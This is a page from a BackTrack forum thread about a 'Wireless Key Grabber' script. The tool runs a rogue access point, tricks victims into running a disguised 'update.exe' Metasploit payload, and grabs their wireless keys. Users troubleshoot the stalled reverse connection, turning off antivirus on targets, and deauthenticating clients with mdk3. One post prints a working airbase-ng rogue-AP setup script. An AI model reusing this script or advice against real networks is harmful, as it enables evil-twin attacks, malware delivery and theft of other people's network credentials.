Page 4 of 5 FirstFirst ... 2345 LastLast
Results 31 to 40 of 41

Thread: Wireless Key Grabber (WKG) Fully automated

  1. #31
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by spawn View Post
    Now I understand the point
    I agree with you
    we can check thus:
    cat -vet wkg.sh

    Again,
    Thanks archangel.amael
    Nothing wrong with doing that. Keep in mind it will only tell you if the "conditions" are true. But it won't fix the problem.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  2. #32
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    16

    Default

    What about the way you've talked about in earlier topic, about forcing user disconnect from original AP ?

  3. #33
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    1

    Default

    thankssssssssssss

    thanksssssssssssssssssss

  4. #34
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by tari9inho View Post
    thankssssssssssss

    thanksssssssssssssssssss
    Do not double post, especially just to post the above.
    Use the edit button.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  5. #35
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    16

    Default

    I've been trying to get this working, with no luck.
    After downloading and executing "update.exe" at my "target" computer, i see "Sending stage" at the one running the WKG script, and doesnt get through that.

    Anyone got this working ?

  6. #36
    Just burned his ISO
    Join Date
    Dec 2009
    Posts
    4

    Default wkg.sh with crappy chipset

    This post is taking my remote-exploit virginity. . . As long as my interface is down, I can tell Airodump-ng to use my wlan0 without having to 'airmon-ng start wlan0' and having to use mon0. I cant get airbase-ng to work by assigning it to wlan0. I have to 'airmon-ng start wlan0' and use mon0 as the parameter with airbase just as scripted in wkg.sh. I can't get wkg to work start to finish, but I'm not giving up yet. For those of you who having problems with your remote machines not seeing your fake AP try inserting this in the wkg.sh for a quick and easy way to edit your parameters upon script opening. Try going back and forth between telling it 'only wlan0' for both the wiface and moniface and wlan0 as wifi and mon0 as monitor channel. Any suggestions will be appreciated.
    This script was taken from the Roguev3.sh and modified slightly to include the moniface parameter.


    Code:
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter your monitoring iface, eg mon0:"
    read -e MONIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    echo -n "Enter your wireless interface MAC(XX:XX:XX:XX:XX:XX) [Optional,]: "
    read -e MAC
    echo -n "Enter the channel you would like your rogue AP to use [Optional]: "
    read -e CHAN
    killall -9 dhcpcd dhcpd3 airbase-ng ettercap
    sleep 1
    airmon-ng stop $MONIFACE
    sleep 2
    airmon-ng stop $WIFACE
    sleep 2
    ifconfig $WIFACE down
    sleep 2
    airmon-ng start $WIFACE
    sleep 2
    modprobe tun &
    
    cmd="konsole -e airbase-ng -e ""$ESSID"" -P -C 30 -v "
    if [ -n "$CHAN" ]; then
    cmd=$cmd"-c "$CHAN" "
    fi
    if [ -n "$MAC" ]; then
    cmd=$cmd"-a "$MAC" "
    fi
    cmd=$cmd"$MONIFACE"
    $cmd &

  7. #37
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    16

    Default

    I just cant get the sending stage working :|
    When i download "update.exe" on the target computer, my laptop starts sending it, but "freezes" and goes no further.

    And another thing i cant seem to be able to do is ddos the ap with mdk3. With my ap set to WEP i can take it down, but if i set it to WPA2 no matter what i do with mdk3 it doesnt goes down.

    Any ideas ?

  8. #38
    Just burned his ISO
    Join Date
    Oct 2008
    Posts
    12

    Default

    i got a problem too.when i run the command after a while when all the 3 terms are already started and gives me an error that says line 95 konquered command not found and then the program stops
    any help?

  9. #39
    Just burned his ISO
    Join Date
    Dec 2009
    Posts
    3

    Default

    Hello,
    I have prob with the WK, the fakeAp box is running like:

    19:48:54 Created tap interface at0
    19:48:54 Trying to set MTU on at0 to 800
    19:48:54 Trying to set MTU on mon0 to 1500
    19:48:54 Access Point with BSSID XX:XX:XX:XX:Xx:XX started.
    19:49:00 Got broadcast probe request from XX:XX:XX:XX:XX:AA
    19:49:00 Got broadcast probe request from XX:XX:XX:XX:XX:AA
    19:49:00 Got broadcast probe request from XX:XX:XX:XX:XX:AA
    etc.....

    What is wrong here?
    thanks

  10. #40
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    7

    Default

    i can't get this thing working fully...

    everything starts great.. user associates the ap.. downloads and runs the update.exe with AV turned off (cause kaspersky detects this as virus). after running update.exe i get sending stage in the metasploit console but then no further action is happening.. no file appears in the key files folder.. i don't know what's wrong, but i do have some thoughts:
    1) the reverse connection could not be made because of the wrong network mapping
    2) users windows xp os is somehow different so that key grabber can't find the keys...

    any thoughts you folks? ;/

Page 4 of 5 FirstFirst ... 2345 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •